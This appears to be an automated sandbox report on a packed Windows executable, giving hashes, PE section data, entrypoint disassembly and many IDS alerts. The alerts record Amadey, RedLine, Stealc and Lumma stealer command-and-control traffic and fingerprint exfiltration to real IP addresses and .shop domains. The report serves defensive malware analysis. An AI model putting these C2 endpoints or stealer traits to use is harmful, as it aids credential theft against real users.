SHA512:	adcb2e990a433e69468c21bc2f0089d147aad354bb3d637f280383f5d31913f4ad80a8c121a565a89b36946df0df02b142955681e257dd4bca66470146b976f3
SSDEEP:	49152:GJd564fdAN+fobpaJztfWOoh1jpt1zeO67:khgfb8tt/oNtcOI
TLSH:	7495335C0D1F3782CD0ADBF36DC96D83EB361485C6F6AFA1A2111EB74A3B1815186E1E
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x8e6000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66A240BE [Thu Jul 25 12:10:38 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F1F5085D01Ah
paddb mm3, qword ptr [00000000h]
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [edx+ecx], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or ecx, dword ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 0Ah
add byte ptr [eax], al
or ecx, dword ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
pop es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6a057	0x6b	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x69000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4e41f8	0x10	ukgzfzxu
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x4e41a8	0x18	ukgzfzxu
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x68000	0x2de00	29a1f66dc089db7cd259235a728b09ea	False	0.9972485950272479	data	7.981135166621274	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x69000	0x1e0	0x200	141a1852fb40e55a18a2071ab7a03568	False	0.58203125	data	4.486531367202845	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6a000	0x1000	0x200	cc76e3822efdc911f469a3e3cc9ce9fe	False	0.1484375	data	1.0428145631430756	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x6b000	0x2c9000	0x200	752d40bb54231b2e6f81a5fbaa4d13e4	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
ukgzfzxu	0x334000	0x1b1000	0x1b0400	972dcf534383a57b0fc0e4237b4bf3c1	False	0.99462749421631	OpenPGP Secret Key	7.954114494969637	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
svxbhzsv	0x4e5000	0x1000	0x400	d19207a9eefc4434e551d2bcc71ce517	False	0.7705078125	data	6.118991976515346	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x4e6000	0x3000	0x2200	4763147a3e8a79ae4f88644fcca22727	False	0.06881893382352941	DOS executable (COM)	0.6425257842599887	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x4e4208	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
kernel32.dll	lstrcpy

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-27T04:21:03.109743+0200	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	192.168.2.5	49710	185.215.113.16	80	TCP
2024-09-27T04:21:04.166961+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49711	185.215.113.117	80	TCP
2024-09-27T04:21:05.370019+0200	2856122	ETPRO MALWARE Amadey CnC Response M1	1	185.215.113.16	80	192.168.2.5	49710	TCP
2024-09-27T04:21:06.076576+0200	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	49712	185.215.113.16	80	TCP
2024-09-27T04:21:06.704853+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49713	194.116.215.195	80	TCP
2024-09-27T04:21:08.140028+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49714	95.179.250.45	26212	TCP
2024-09-27T04:21:08.140028+0200	2046045	ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)	1	192.168.2.5	49714	95.179.250.45	26212	TCP
2024-09-27T04:21:08.333467+0200	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	1	95.179.250.45	26212	192.168.2.5	49714	TCP
2024-09-27T04:21:08.998809+0200	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	49715	185.215.113.16	80	TCP
2024-09-27T04:21:09.984061+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49716	185.215.113.26	80	TCP
2024-09-27T04:21:12.148645+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49719	65.21.18.51	45580	TCP
2024-09-27T04:21:12.148645+0200	2046045	ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)	1	192.168.2.5	49719	65.21.18.51	45580	TCP
2024-09-27T04:21:12.438294+0200	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	1	65.21.18.51	45580	192.168.2.5	49719	TCP
2024-09-27T04:21:12.438395+0200	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	49720	185.215.113.16	80	TCP
2024-09-27T04:21:12.583748+0200	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	1	65.21.18.51	45580	192.168.2.5	49719	TCP
2024-09-27T04:21:12.657577+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49720	185.215.113.16	80	TCP
2024-09-27T04:21:13.398377+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49714	95.179.250.45	26212	TCP
2024-09-27T04:21:13.595211+0200	2046056	ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)	1	95.179.250.45	26212	192.168.2.5	49714	TCP
2024-09-27T04:21:13.800459+0200	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	192.168.2.5	49721	185.215.113.26	80	TCP
2024-09-27T04:21:13.817728+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49714	95.179.250.45	26212	TCP
2024-09-27T04:21:14.176245+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49714	95.179.250.45	26212	TCP
2024-09-27T04:21:14.482192+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49714	95.179.250.45	26212	TCP
2024-09-27T04:21:14.491667+0200	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	49723	185.215.113.16	80	TCP
2024-09-27T04:21:14.682022+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49714	95.179.250.45	26212	TCP
2024-09-27T04:21:14.973067+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49714	95.179.250.45	26212	TCP
2024-09-27T04:21:14.987691+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49724	176.113.115.95	80	TCP
2024-09-27T04:21:15.170311+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49714	95.179.250.45	26212	TCP
2024-09-27T04:21:15.269386+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49725	185.215.113.117	80	TCP
2024-09-27T04:21:15.281835+0200	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.5	49722	185.215.113.17	80	TCP
2024-09-27T04:21:15.369248+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49714	95.179.250.45	26212	TCP
2024-09-27T04:21:15.512109+0200	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	1	192.168.2.5	49722	185.215.113.17	80	TCP
2024-09-27T04:21:15.518160+0200	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	1	185.215.113.17	80	192.168.2.5	49722	TCP
2024-09-27T04:21:15.616618+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49714	95.179.250.45	26212	TCP
2024-09-27T04:21:15.743022+0200	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	1	192.168.2.5	49722	185.215.113.17	80	TCP
2024-09-27T04:21:15.836522+0200	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	185.215.113.17	80	192.168.2.5	49722	TCP
2024-09-27T04:21:15.856746+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49714	95.179.250.45	26212	TCP
2024-09-27T04:21:16.052602+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49714	95.179.250.45	26212	TCP
2024-09-27T04:21:16.332605+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49714	95.179.250.45	26212	TCP
2024-09-27T04:21:16.427085+0200	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	1	192.168.2.5	49722	185.215.113.17	80	TCP
2024-09-27T04:21:16.661175+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49714	95.179.250.45	26212	TCP
2024-09-27T04:21:16.780172+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49714	95.179.250.45	26212	TCP
2024-09-27T04:21:16.977314+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49714	95.179.250.45	26212	TCP
2024-09-27T04:21:16.988562+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49722	185.215.113.17	80	TCP
2024-09-27T04:21:17.186234+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49714	95.179.250.45	26212	TCP
2024-09-27T04:21:17.494773+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49719	65.21.18.51	45580	TCP
2024-09-27T04:21:17.508217+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49714	95.179.250.45	26212	TCP
2024-09-27T04:21:17.843765+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49719	65.21.18.51	45580	TCP
2024-09-27T04:21:17.848571+0200	2046056	ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)	1	65.21.18.51	45580	192.168.2.5	49719	TCP
2024-09-27T04:21:18.060072+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49719	65.21.18.51	45580	TCP
2024-09-27T04:21:18.379078+0200	2856122	ETPRO MALWARE Amadey CnC Response M1	1	185.215.113.26	80	192.168.2.5	49721	TCP
2024-09-27T04:21:18.772116+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49714	95.179.250.45	26212	TCP
2024-09-27T04:21:19.178330+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49714	95.179.250.45	26212	TCP
2024-09-27T04:21:19.183486+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49714	95.179.250.45	26212	TCP
2024-09-27T04:21:20.219293+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49719	65.21.18.51	45580	TCP
2024-09-27T04:21:20.611307+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49719	65.21.18.51	45580	TCP
2024-09-27T04:21:20.813244+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49719	65.21.18.51	45580	TCP
2024-09-27T04:21:20.850558+0200	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	49728	185.215.113.16	80	TCP
2024-09-27T04:21:20.908544+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49714	95.179.250.45	26212	TCP
2024-09-27T04:21:21.017152+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49719	65.21.18.51	45580	TCP
2024-09-27T04:21:21.102882+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49714	95.179.250.45	26212	TCP
2024-09-27T04:21:21.116616+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49728	185.215.113.16	80	TCP
2024-09-27T04:21:21.296039+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49714	95.179.250.45	26212	TCP
2024-09-27T04:21:21.567423+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49714	95.179.250.45	26212	TCP
2024-09-27T04:21:21.576698+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49719	65.21.18.51	45580	TCP
2024-09-27T04:21:21.782648+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49719	65.21.18.51	45580	TCP
2024-09-27T04:21:22.097536+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49719	65.21.18.51	45580	TCP
2024-09-27T04:21:22.313225+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49719	65.21.18.51	45580	TCP
2024-09-27T04:21:22.534709+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49719	65.21.18.51	45580	TCP
2024-09-27T04:21:22.736067+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49719	65.21.18.51	45580	TCP
2024-09-27T04:21:23.364228+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49719	65.21.18.51	45580	TCP
2024-09-27T04:21:23.491147+0200	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	49731	185.215.113.16	80	TCP
2024-09-27T04:21:23.568877+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49719	65.21.18.51	45580	TCP
2024-09-27T04:21:24.078791+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49719	65.21.18.51	45580	TCP
2024-09-27T04:21:24.196540+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49722	185.215.113.17	80	TCP
2024-09-27T04:21:24.234487+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49733	185.215.113.117	80	TCP
2024-09-27T04:21:24.391440+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49719	65.21.18.51	45580	TCP
2024-09-27T04:21:25.629497+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49722	185.215.113.17	80	TCP
2024-09-27T04:21:25.937055+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49719	65.21.18.51	45580	TCP
2024-09-27T04:21:26.137919+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49719	65.21.18.51	45580	TCP
2024-09-27T04:21:26.338483+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49719	65.21.18.51	45580	TCP
2024-09-27T04:21:26.443025+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49722	185.215.113.17	80	TCP
2024-09-27T04:21:26.566308+0200	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	49738	185.215.113.16	80	TCP
2024-09-27T04:21:26.650781+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49719	65.21.18.51	45580	TCP
2024-09-27T04:21:27.063921+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49722	185.215.113.17	80	TCP
2024-09-27T04:21:27.329679+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49740	185.215.113.117	80	TCP
2024-09-27T04:21:28.866765+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49722	185.215.113.17	80	TCP
2024-09-27T04:21:29.352246+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49743	89.105.223.196	29862	TCP
2024-09-27T04:21:29.352246+0200	2046045	ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)	1	192.168.2.5	49743	89.105.223.196	29862	TCP
2024-09-27T04:21:29.465052+0200	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	49744	185.215.113.16	80	TCP
2024-09-27T04:21:29.526562+0200	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	1	89.105.223.196	29862	192.168.2.5	49743	TCP
2024-09-27T04:21:29.597316+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49722	185.215.113.17	80	TCP
2024-09-27T04:21:29.688021+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49744	185.215.113.16	80	TCP
2024-09-27T04:21:29.739621+0200	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	1	89.105.223.196	29862	192.168.2.5	49743	TCP
2024-09-27T04:21:32.022330+0200	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	49749	185.215.113.16	80	TCP
2024-09-27T04:21:32.247108+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49749	185.215.113.16	80	TCP
2024-09-27T04:21:32.851910+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49750	185.215.113.67	15206	TCP
2024-09-27T04:21:32.851910+0200	2046045	ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)	1	192.168.2.5	49750	185.215.113.67	15206	TCP
2024-09-27T04:21:33.068659+0200	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	1	185.215.113.67	15206	192.168.2.5	49750	TCP
2024-09-27T04:21:34.572744+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49743	89.105.223.196	29862	TCP
2024-09-27T04:21:34.673992+0200	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	49753	185.215.113.16	80	TCP
2024-09-27T04:21:34.905386+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49753	185.215.113.16	80	TCP
2024-09-27T04:21:35.394851+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49743	89.105.223.196	29862	TCP
2024-09-27T04:21:35.399703+0200	2046056	ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)	1	89.105.223.196	29862	192.168.2.5	49743	TCP
2024-09-27T04:21:35.574292+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49743	89.105.223.196	29862	TCP
2024-09-27T04:21:35.722605+0200	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.5	49755	91.202.233.158	80	TCP
2024-09-27T04:21:35.798129+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49743	89.105.223.196	29862	TCP
2024-09-27T04:21:35.976244+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49743	89.105.223.196	29862	TCP
2024-09-27T04:21:36.426655+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49743	89.105.223.196	29862	TCP
2024-09-27T04:21:36.732332+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49743	89.105.223.196	29862	TCP
2024-09-27T04:21:36.906933+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49743	89.105.223.196	29862	TCP
2024-09-27T04:21:36.986236+0200	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	49757	185.215.113.16	80	TCP
2024-09-27T04:21:37.079702+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49743	89.105.223.196	29862	TCP
2024-09-27T04:21:37.791130+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49759	185.215.113.103	80	TCP
2024-09-27T04:21:38.121784+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49750	185.215.113.67	15206	TCP
2024-09-27T04:21:38.430892+0200	2046056	ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)	1	185.215.113.67	15206	192.168.2.5	49750	TCP
2024-09-27T04:21:38.733929+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49743	89.105.223.196	29862	TCP
2024-09-27T04:21:38.740303+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49743	89.105.223.196	29862	TCP
2024-09-27T04:21:39.303670+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49743	89.105.223.196	29862	TCP
2024-09-27T04:21:39.477939+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49743	89.105.223.196	29862	TCP
2024-09-27T04:21:39.568380+0200	2056156	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawzhotdog .shop)	1	192.168.2.5	60924	1.1.1.1	53	UDP
2024-09-27T04:21:39.595188+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49750	185.215.113.67	15206	TCP
2024-09-27T04:21:39.800528+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49743	89.105.223.196	29862	TCP
2024-09-27T04:21:39.805609+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49743	89.105.223.196	29862	TCP
2024-09-27T04:21:39.891955+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49750	185.215.113.67	15206	TCP
2024-09-27T04:21:40.067143+0200	2056157	ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawzhotdog .shop in TLS SNI)	1	192.168.2.5	49761	172.67.162.108	443	TCP
2024-09-27T04:21:40.834724+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49761	172.67.162.108	443	TCP
2024-09-27T04:21:40.834724+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49761	172.67.162.108	443	TCP
2024-09-27T04:21:40.882674+0200	2056164	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gutterydhowi .shop)	1	192.168.2.5	54804	1.1.1.1	53	UDP
2024-09-27T04:21:41.024523+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49750	185.215.113.67	15206	TCP
2024-09-27T04:21:41.327037+0200	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	49763	185.215.113.16	80	TCP
2024-09-27T04:21:41.358465+0200	2056165	ET MALWARE Observed Win32/Lumma Stealer Related Domain (gutterydhowi .shop in TLS SNI)	1	192.168.2.5	49764	104.21.4.136	443	TCP
2024-09-27T04:21:41.799990+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49764	104.21.4.136	443	TCP
2024-09-27T04:21:41.799990+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49764	104.21.4.136	443	TCP
2024-09-27T04:21:41.811165+0200	2056162	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ghostreedmnu .shop)	1	192.168.2.5	63062	1.1.1.1	53	UDP
2024-09-27T04:21:41.985937+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49750	185.215.113.67	15206	TCP
2024-09-27T04:21:42.150872+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49766	185.215.113.103	80	TCP
2024-09-27T04:21:42.263346+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49750	185.215.113.67	15206	TCP
2024-09-27T04:21:42.286462+0200	2056163	ET MALWARE Observed Win32/Lumma Stealer Related Domain (ghostreedmnu .shop in TLS SNI)	1	192.168.2.5	49768	188.114.97.3	443	TCP
2024-09-27T04:21:42.468552+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49743	89.105.223.196	29862	TCP
2024-09-27T04:21:42.605262+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49750	185.215.113.67	15206	TCP
2024-09-27T04:21:42.610943+0200	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.5	49767	185.215.113.37	80	TCP
2024-09-27T04:21:42.650790+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49743	89.105.223.196	29862	TCP
2024-09-27T04:21:42.768513+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49768	188.114.97.3	443	TCP
2024-09-27T04:21:42.768513+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49768	188.114.97.3	443	TCP
